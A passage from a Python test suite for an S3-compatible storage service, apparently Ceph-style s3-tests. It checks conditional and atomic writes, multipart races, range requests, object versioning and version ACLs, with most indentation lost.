lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
# verify B's
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write atomicity')
@attr(assertion='1MB successful')
@attr('fails_on_aws')
def test_atomic_conditional_write_1mb():
_test_atomic_conditional_write(1024*1024)
def _test_atomic_dual_conditional_write(file_size):
"""
create an object, two sessions writing different contents
confirm that it is all one or the other
"""
bucket_name = get_new_bucket()
objname = 'testobj'
client = get_client()
fp_a = FakeWriteFile(file_size, 'A')
response = client.put_object(Bucket=bucket_name, Key=objname, Body=fp_a)
_verify_atomic_key_data(bucket_name, objname, file_size, 'A')
etag_fp_a = response['ETag'].replace('"', '')
# write <file_size> file of C's
# but before we're done, try to write all B's
fp_b = FakeWriteFile(file_size, 'B')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': etag_fp_a}))
client.meta.events.register('before-call.s3.PutObject', lf)
def rewind_put_fp_b():
fp_b.seek(0)
client.put_object(Bucket=bucket_name, Key=objname, Body=fp_b)
fp_c = FakeWriteFile(file_size, 'C', rewind_put_fp_b)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=objname, Body=fp_c)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
# verify the file
_verify_atomic_key_data(bucket_name, objname, file_size, 'B')
@attr(resource='object')
@attr(method='put')
@attr(operation='write one or the other')
@attr(assertion='1MB successful')
@attr('fails_on_aws')
# TODO: test not passing with SSL, fix this
@attr('fails_on_rgw')
def test_atomic_dual_conditional_write_1mb():
_test_atomic_dual_conditional_write(1024*1024)
@attr(resource='object')
@attr(method='put')
@attr(operation='write file in deleted bucket')
@attr(assertion='fail 404')
@attr('fails_on_aws')
# TODO: test not passing with SSL, fix this
@attr('fails_on_rgw')
def test_atomic_write_bucket_gone():
bucket_name = get_new_bucket()
client = get_client()
def remove_bucket():
client.delete_bucket(Bucket=bucket_name)
objname = 'foo'
fp_a = FakeWriteFile(1024*1024, 'A', remove_bucket)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key=objname, Body=fp_a)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='put')
@attr(operation='begin to overwrite file with multipart upload then abort')
@attr(assertion='read back original key contents')
def test_atomic_multipart_upload_write():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.create_multipart_upload(Bucket=bucket_name, Key='foo')
upload_id = response['UploadId']
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
client.abort_multipart_upload(Bucket=bucket_name, Key='foo', UploadId=upload_id)
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
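# helpers for test_multipart_resend_first_finishes_last below: Counter tallies
# callback invocations (used to count how many times upload_part reads the
# dry-run file object), and ActionOnCount fires its action once trigger() has
# been called trigger_count times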
class Counter:
def __init__(self, default_val):
self.val = default_val
def inc(self):
self.val = self.val + 1
class ActionOnCount:
def __init__(self, trigger_count, action):
self.count = 0
self.trigger_count = trigger_count
self.action = action
self.result = 0
def trigger(self):
self.count = self.count + 1
if self.count == self.trigger_count:
self.result = self.action()
@attr(resource='object')
@attr(method='put')
@attr(operation='multipart check for two writes of the same part, first write finishes last')
@attr(assertion='object contains correct content')
def test_multipart_resend_first_finishes_last():
bucket_name = get_new_bucket()
client = get_client()
key_name = "mymultipart"
response = client.create_multipart_upload(Bucket=bucket_name, Key=key_name)
upload_id = response['UploadId']
#file_size = 8*1024*1024
file_size = 8
counter = Counter(0)
# upload_part might read multiple times from the object
# first time when it calculates md5, second time when it writes data
# out. We want to interject only on the last time, but we can't be
# sure how many times it's going to read, so let's have a test run
# and count the number of reads
fp_dry_run = FakeWriteFile(file_size, 'C',
lambda: counter.inc()
)
parts = []
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key_name, PartNumber=1, Body=fp_dry_run)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key_name, UploadId=upload_id, MultipartUpload={'Parts': parts})
client.delete_object(Bucket=bucket_name, Key=key_name)
# clear parts
parts[:] = []
# ok, now for the actual test
fp_b = FakeWriteFile(file_size, 'B')
def upload_fp_b():
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key_name, Body=fp_b, PartNumber=1)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 1})
action = ActionOnCount(counter.val, lambda: upload_fp_b())
response = client.create_multipart_upload(Bucket=bucket_name, Key=key_name)
upload_id = response['UploadId']
fp_a = FakeWriteFile(file_size, 'A',
lambda: action.trigger()
)
response = client.upload_part(UploadId=upload_id, Bucket=bucket_name, Key=key_name, PartNumber=1, Body=fp_a)
parts.append({'ETag': response['ETag'].strip('"'), 'PartNumber': 1})
client.complete_multipart_upload(Bucket=bucket_name, Key=key_name, UploadId=upload_id, MultipartUpload={'Parts': parts})
_verify_atomic_key_data(bucket_name, key_name, file_size, 'A')
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_request_response_code():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=4-7')
fetched_content = _get_body(response)
eq(fetched_content, content[4:8])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 4-7/11')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
def _generate_random_string(size):
return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(size))
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_big_request_response_code():
content = _generate_random_string(8*1024*1024)
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=3145728-5242880')
fetched_content = _get_body(response)
eq(fetched_content, content[3145728:5242881])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 3145728-5242880/8388608')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_request_skip_leading_bytes_response_code():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=4-')
fetched_content = _get_body(response)
eq(fetched_content, content[4:])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 4-10/11')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns correct data, 206')
def test_ranged_request_return_trailing_bytes_response_code():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
response = client.get_object(Bucket=bucket_name, Key='testobj', Range='bytes=-7')
fetched_content = _get_body(response)
eq(fetched_content, content[-7:])
eq(response['ResponseMetadata']['HTTPHeaders']['content-range'], 'bytes 4-10/11')
eq(response['ResponseMetadata']['HTTPStatusCode'], 206)
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns invalid range, 416')
def test_ranged_request_invalid_range():
content = 'testcontent'
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
# test invalid range
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='testobj', Range='bytes=40-50')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 416)
eq(error_code, 'InvalidRange')
@attr(resource='object')
@attr(method='get')
@attr(operation='range')
@attr(assertion='returns invalid range, 416')
def test_ranged_request_empty_object():
content = ''
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='testobj', Body=content)
# test invalid range
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='testobj', Range='bytes=40-50')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 416)
eq(error_code, 'InvalidRange')
@attr(resource='bucket')
@attr(method='create')
@attr(operation='create versioned bucket')
@attr(assertion='can create and suspend bucket versioning')
@attr('versioning')
def test_versioning_bucket_create_suspend():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
def check_obj_content(client, bucket_name, key, version_id, content):
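    # content=None means the given version id is expected to be a delete marker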
response = client.get_object(Bucket=bucket_name, Key=key, VersionId=version_id)
if content is not None:
body = _get_body(response)
eq(body, content)
else:
eq(response['DeleteMarker'], True)
def check_obj_versions(client, bucket_name, key, version_ids, contents):
    # check that the listed versions point at the expected version ids and contents
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
    # list_object_versions returns versions newest-first, while version_ids &
    # contents are oldest-first, so reverse the listing to line them up
versions.reverse()
i = 0
for version in versions:
eq(version['VersionId'], version_ids[i])
eq(version['Key'], key)
check_obj_content(client, bucket_name, key, version['VersionId'], contents[i])
i += 1
def create_multiple_versions(client, bucket_name, key, num_versions, version_ids = None, contents = None, check_versions = True):
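    # puts num_versions new versions of key, appending their bodies and version
    # ids to the given lists (mutated in place and also returned); optionally
    # verifies the resulting version listing afterwards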
contents = contents or []
version_ids = version_ids or []
for i in range(num_versions):
body = 'content-{i}'.format(i=i)
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
version_id = response['VersionId']
contents.append(body)
version_ids.append(version_id)
if check_versions:
check_obj_versions(client, bucket_name, key, version_ids, contents)
return (version_ids, contents)
def remove_obj_version(client, bucket_name, key, version_ids, contents, index):
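    # deletes the version at the given index (modulo the list length), checking
    # its content first and re-checking the remaining versions afterwards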
eq(len(version_ids), len(contents))
index = index % len(version_ids)
rm_version_id = version_ids.pop(index)
rm_content = contents.pop(index)
check_obj_content(client, bucket_name, key, rm_version_id, rm_content)
client.delete_object(Bucket=bucket_name, Key=key, VersionId=rm_version_id)
if len(version_ids) != 0:
check_obj_versions(client, bucket_name, key, version_ids, contents)
def clean_up_bucket(client, bucket_name, key, version_ids):
for version_id in version_ids:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id)
client.delete_bucket(Bucket=bucket_name)
def _do_test_create_remove_versions(client, bucket_name, key, num_versions, remove_start_idx, idx_inc):
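    # creates num_versions versions, then removes them one by one starting at
    # remove_start_idx and stepping by idx_inc, printing whatever versions remain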
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
idx = remove_start_idx
for j in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
idx += idx_inc
response = client.list_object_versions(Bucket=bucket_name)
if 'Versions' in response:
print(response['Versions'])
@attr(resource='object')
@attr(method='create')
@attr(operation='create and remove versioned object')
@attr(assertion='can create access and remove appropriate versions')
@attr('versioning')
def test_versioning_obj_create_read_remove():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'MFADelete': 'Disabled', 'Status': 'Enabled'})
key = 'testobj'
num_versions = 5
_do_test_create_remove_versions(client, bucket_name, key, num_versions, -1, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, -1, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 0, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 1, 0)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 4, -1)
_do_test_create_remove_versions(client, bucket_name, key, num_versions, 3, 3)
@attr(resource='object')
@attr(method='create')
@attr(operation='create and remove versioned object and head')
@attr(assertion='can create access and remove appropriate versions')
@attr('versioning')
def test_versioning_obj_create_read_remove_head():
bucket_name = get_new_bucket()
client = get_client()
client.put_bucket_versioning(Bucket=bucket_name, VersioningConfiguration={'MFADelete': 'Disabled', 'Status': 'Enabled'})
key = 'testobj'
num_versions = 5
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
# removes old head object, checks new one
removed_version_id = version_ids.pop()
contents.pop()
num_versions = num_versions-1
response = client.delete_object(Bucket=bucket_name, Key=key, VersionId=removed_version_id)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, contents[-1])
# add a delete marker
response = client.delete_object(Bucket=bucket_name, Key=key)
eq(response['DeleteMarker'], True)
delete_marker_version_id = response['VersionId']
version_ids.append(delete_marker_version_id)
response = client.list_object_versions(Bucket=bucket_name)
eq(len(response['Versions']), num_versions)
eq(len(response['DeleteMarkers']), 1)
eq(response['DeleteMarkers'][0]['VersionId'], delete_marker_version_id)
clean_up_bucket(client, bucket_name, key, version_ids)
@attr(resource='object')
@attr(method='create')
@attr(operation='create object, then switch to versioning')
@attr(assertion='behaves correctly')
@attr('versioning')
def test_versioning_obj_plain_null_version_removal():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
client = get_client()
key = 'testobjfoo'
content = 'fooz'
client.put_object(Bucket=bucket_name, Key=key, Body=content)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
client.delete_object(Bucket=bucket_name, Key=key, VersionId='null')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='create')
@attr(operation='create object, then switch to versioning')
@attr(assertion='behaves correctly')
@attr('versioning')
def test_versioning_obj_plain_null_version_overwrite():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
client = get_client()
key = 'testobjfoo'
content = 'fooz'
client.put_object(Bucket=bucket_name, Key=key, Body=content)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
content2 = 'zzz'
response = client.put_object(Bucket=bucket_name, Key=key, Body=content2)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, content2)
version_id = response['VersionId']
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, content)
client.delete_object(Bucket=bucket_name, Key=key, VersionId='null')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='create')
@attr(operation='create object, then switch to versioning')
@attr(assertion='behaves correctly')
@attr('versioning')
def test_versioning_obj_plain_null_version_overwrite_suspended():
bucket_name = get_new_bucket()
check_versioning(bucket_name, None)
client = get_client()
key = 'testobjbar'
content = 'foooz'
client.put_object(Bucket=bucket_name, Key=key, Body=content)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
content2 = 'zzz'
response = client.put_object(Bucket=bucket_name, Key=key, Body=content2)
response = client.get_object(Bucket=bucket_name, Key=key)
body = _get_body(response)
eq(body, content2)
response = client.list_object_versions(Bucket=bucket_name)
# original object with 'null' version id still counts as a version
eq(len(response['Versions']), 1)
client.delete_object(Bucket=bucket_name, Key=key, VersionId='null')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key=key)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
def delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents):
    client.delete_object(Bucket=bucket_name, Key=key)
    # clear out old null entries from the lists since they get overwritten;
    # iterate over a copy so popping does not skip elements
    eq(len(version_ids), len(contents))
    i = 0
    for version_id in list(version_ids):
        if version_id == 'null':
            version_ids.pop(i)
            contents.pop(i)
        else:
            i += 1
    return (version_ids, contents)
def overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, content):
    client.put_object(Bucket=bucket_name, Key=key, Body=content)
    # clear out old null entries from the lists since they get overwritten;
    # iterate over a copy so popping does not skip elements
    eq(len(version_ids), len(contents))
    i = 0
    for version_id in list(version_ids):
        if version_id == 'null':
            version_ids.pop(i)
            contents.pop(i)
        else:
            i += 1
    # add the new content with a 'null' version id to the end
    contents.append(content)
    version_ids.append('null')
    return (version_ids, contents)
@attr(resource='object')
@attr(method='create')
@attr(operation='suspend versioned bucket')
@attr(assertion='suspended versioning behaves correctly')
@attr('versioning')
def test_versioning_obj_suspend_versions():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 5
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
check_configure_versioning_retry(bucket_name, "Suspended", "Suspended")
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, 'null content 1')
overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, 'null content 2')
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
overwrite_suspended_versioning_obj(client, bucket_name, key, version_ids, contents, 'null content 3')
delete_suspended_versioning_obj(client, bucket_name, key, version_ids, contents)
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, 3, version_ids, contents)
num_versions += 3
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='remove')
@attr(operation='create and remove versions')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_create_versions_remove_all():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 10
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='remove')
@attr(operation='create and remove versions')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_create_versions_remove_special_names():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
keys = ['_testobj', '_', ':', ' ']
num_versions = 10
for key in keys:
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='multipart')
@attr(operation='create and test multipart object')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_create_overwrite_multipart():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 3
contents = []
version_ids = []
for i in range(num_versions):
ret = _do_test_multipart_upload_contents(bucket_name, key, 3)
contents.append(ret)
response = client.list_object_versions(Bucket=bucket_name)
for version in response['Versions']:
version_ids.append(version['VersionId'])
version_ids.reverse()
check_obj_versions(client, bucket_name, key, version_ids, contents)
for idx in range(num_versions):
remove_obj_version(client, bucket_name, key, version_ids, contents, idx)
eq(len(version_ids), 0)
eq(len(version_ids), len(contents))
@attr(resource='object')
@attr(method='multipart')
@attr(operation='list versioned objects')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_obj_list_marker():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
key2 = 'testobj-1'
num_versions = 5
contents = []
version_ids = []
contents2 = []
version_ids2 = []
# for key #1
for i in range(num_versions):
body = 'content-{i}'.format(i=i)
response = client.put_object(Bucket=bucket_name, Key=key, Body=body)
version_id = response['VersionId']
contents.append(body)
version_ids.append(version_id)
# for key #2
for i in range(num_versions):
body = 'content-{i}'.format(i=i)
response = client.put_object(Bucket=bucket_name, Key=key2, Body=body)
version_id = response['VersionId']
contents2.append(body)
version_ids2.append(version_id)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
    # list_object_versions returns versions sorted by key and newest-first within
    # each key, while version_ids/version_ids2 are oldest-first, so reverse the
    # listing to line them up
    versions.reverse()
    # after the reversal, key2's versions (created last) come first
    for i in range(5):
        version = versions[i]
        eq(version['VersionId'], version_ids2[i])
        eq(version['Key'], key2)
        check_obj_content(client, bucket_name, key2, version['VersionId'], contents2[i])
    # then key's versions
    for j in range(5):
        version = versions[5 + j]
        eq(version['VersionId'], version_ids[j])
        eq(version['Key'], key)
        check_obj_content(client, bucket_name, key, version['VersionId'], contents[j])
@attr(resource='object')
@attr(method='multipart')
@attr(operation='create and test versioned object copying')
@attr(assertion='everything works')
@attr('versioning')
def test_versioning_copy_obj_version():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'testobj'
num_versions = 3
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
for i in range(num_versions):
new_key_name = 'key_{i}'.format(i=i)
copy_source = {'Bucket': bucket_name, 'Key': key, 'VersionId': version_ids[i]}
client.copy_object(Bucket=bucket_name, CopySource=copy_source, Key=new_key_name)
response = client.get_object(Bucket=bucket_name, Key=new_key_name)
body = _get_body(response)
eq(body, contents[i])
another_bucket_name = get_new_bucket()
for i in range(num_versions):
new_key_name = 'key_{i}'.format(i=i)
copy_source = {'Bucket': bucket_name, 'Key': key, 'VersionId': version_ids[i]}
client.copy_object(Bucket=another_bucket_name, CopySource=copy_source, Key=new_key_name)
response = client.get_object(Bucket=another_bucket_name, Key=new_key_name)
body = _get_body(response)
eq(body, contents[i])
new_key_name = 'new_key'
copy_source = {'Bucket': bucket_name, 'Key': key}
client.copy_object(Bucket=another_bucket_name, CopySource=copy_source, Key=new_key_name)
response = client.get_object(Bucket=another_bucket_name, Key=new_key_name)
body = _get_body(response)
eq(body, contents[-1])
@attr(resource='object')
@attr(method='delete')
@attr(operation='delete multiple versions')
@attr(assertion='deletes multiple versions of an object with a single call')
@attr('versioning')
def test_versioning_multi_object_delete():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'key'
num_versions = 2
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
versions.reverse()
for version in versions:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
# now remove again, should all succeed due to idempotency
for version in versions:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='delete')
@attr(operation='delete multiple versions')
@attr(assertion='deletes multiple versions of an object and delete marker with a single call')
@attr('versioning')
def test_versioning_multi_object_delete_with_marker():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'key'
num_versions = 2
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
client.delete_object(Bucket=bucket_name, Key=key)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
delete_markers = response['DeleteMarkers']
version_ids.append(delete_markers[0]['VersionId'])
eq(len(version_ids), 3)
eq(len(delete_markers), 1)
for version in versions:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
for delete_marker in delete_markers:
client.delete_object(Bucket=bucket_name, Key=key, VersionId=delete_marker['VersionId'])
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
eq(('DeleteMarkers' in response), False)
    # now remove again, should all succeed due to idempotency
    for version in versions:
        client.delete_object(Bucket=bucket_name, Key=key, VersionId=version['VersionId'])
    for delete_marker in delete_markers:
        client.delete_object(Bucket=bucket_name, Key=key, VersionId=delete_marker['VersionId'])
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
eq(('DeleteMarkers' in response), False)
@attr(resource='object')
@attr(method='delete')
@attr(operation='multi delete create marker')
@attr(assertion='returns correct marker version id')
@attr('versioning')
def test_versioning_multi_object_delete_with_marker_create():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'key'
response = client.delete_object(Bucket=bucket_name, Key=key)
delete_marker_version_id = response['VersionId']
response = client.list_object_versions(Bucket=bucket_name)
delete_markers = response['DeleteMarkers']
eq(len(delete_markers), 1)
eq(delete_marker_version_id, delete_markers[0]['VersionId'])
eq(key, delete_markers[0]['Key'])
@attr(resource='object')
@attr(method='put')
@attr(operation='change acl on an object version changes specific version')
@attr(assertion='works')
@attr('versioning')
def test_versioned_object_acl():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'xyz'
num_versions = 3
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
version_id = version_ids[1]
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
display_name = get_main_display_name()
user_id = get_main_user_id()
eq(response['Owner']['DisplayName'], display_name)
eq(response['Owner']['ID'], user_id)
grants = response['Grants']
default_policy = [
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
]
check_grants(grants, default_policy)
client.put_object_acl(ACL='public-read',Bucket=bucket_name, Key=key, VersionId=version_id)
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
client.put_object(Bucket=bucket_name, Key=key)
response = client.get_object_acl(Bucket=bucket_name, Key=key)
grants = response['Grants']
check_grants(grants, default_policy)
@attr(resource='object')
@attr(method='put')
@attr(operation='change acl on an object with no version specified changes latest version')
@attr(assertion='works')
@attr('versioning')
def test_versioned_object_acl_no_version_specified():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'xyz'
num_versions = 3
(version_ids, contents) = create_multiple_versions(client, bucket_name, key, num_versions)
response = client.get_object(Bucket=bucket_name, Key=key)
version_id = response['VersionId']
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
display_name = get_main_display_name()
user_id = get_main_user_id()
eq(response['Owner']['DisplayName'], display_name)
eq(response['Owner']['ID'], user_id)
grants = response['Grants']
default_policy = [
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
]
check_grants(grants, default_policy)
client.put_object_acl(ACL='public-read',Bucket=bucket_name, Key=key)
response = client.get_object_acl(Bucket=bucket_name, Key=key, VersionId=version_id)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=None,
DisplayName=None,
URI='http://acs.amazonaws.com/groups/global/AllUsers',
EmailAddress=None,
Type='Group',
),
dict(
Permission='FULL_CONTROL',
ID=user_id,
DisplayName=display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
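# concurrency helpers: spawn one thread per put/delete of an object version and
# return the thread list so the caller can join them via _do_wait_completion()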
def _do_create_object(client, bucket_name, key, i):
body = 'data {i}'.format(i=i)
client.put_object(Bucket=bucket_name, Key=key, Body=body)
def _do_remove_ver(client, bucket_name, key, version_id):
client.delete_object(Bucket=bucket_name, Key=key, VersionId=version_id)
def _do_create_versioned_obj_concurrent(client, bucket_name, key, num):
t = []
for i in range(num):
thr = threading.Thread(target = _do_create_object, args=(client, bucket_name, key, i))
thr.start()
t.append(thr)
return t
def _do_clear_versioned_bucket_concurrent(client, bucket_name):
t = []
response = client.list_object_versions(Bucket=bucket_name)
for version in response.get('Versions', []):
thr = threading.Thread(target = _do_remove_ver, args=(client, bucket_name, version['Key'], version['VersionId']))
thr.start()
t.append(thr)
return t
def _do_wait_completion(t):
for thr in t:
thr.join()
@attr(resource='object')
@attr(method='put')
@attr(operation='concurrent creation of objects, concurrent removal')
@attr(assertion='works')
# TODO: remove fails_on_rgw when https://tracker.ceph.com/issues/39142 is resolved
@attr('fails_on_rgw')
@attr('versioning')
def test_versioned_concurrent_object_create_concurrent_remove():
bucket_name = get_new_bucket()
client = get_client()
check_configure_versioning_retry(bucket_name, "Enabled", "Enabled")
key = 'myobj'
num_versions = 5
for i in range(5):
t = _do_create_versioned_obj_concurrent(client, bucket_name, key, num_versions)
_do_wait_completion(t)
response = client.list_object_versions(Bucket=bucket_name)
versions = response['Versions']
eq(len(versions), num_versions)
t = _do_clear_versioned_bucket_concurrent(client, bucket_name)
_do_wait_completion(t)
response = client.list_object_versions(Bucket=bucket_name)
eq(('Versions' in response), False)
@attr(resource='object')
@attr(method='put')
@attr(operation='concurrent creation and removal of objects')
@attr(assertion='works')
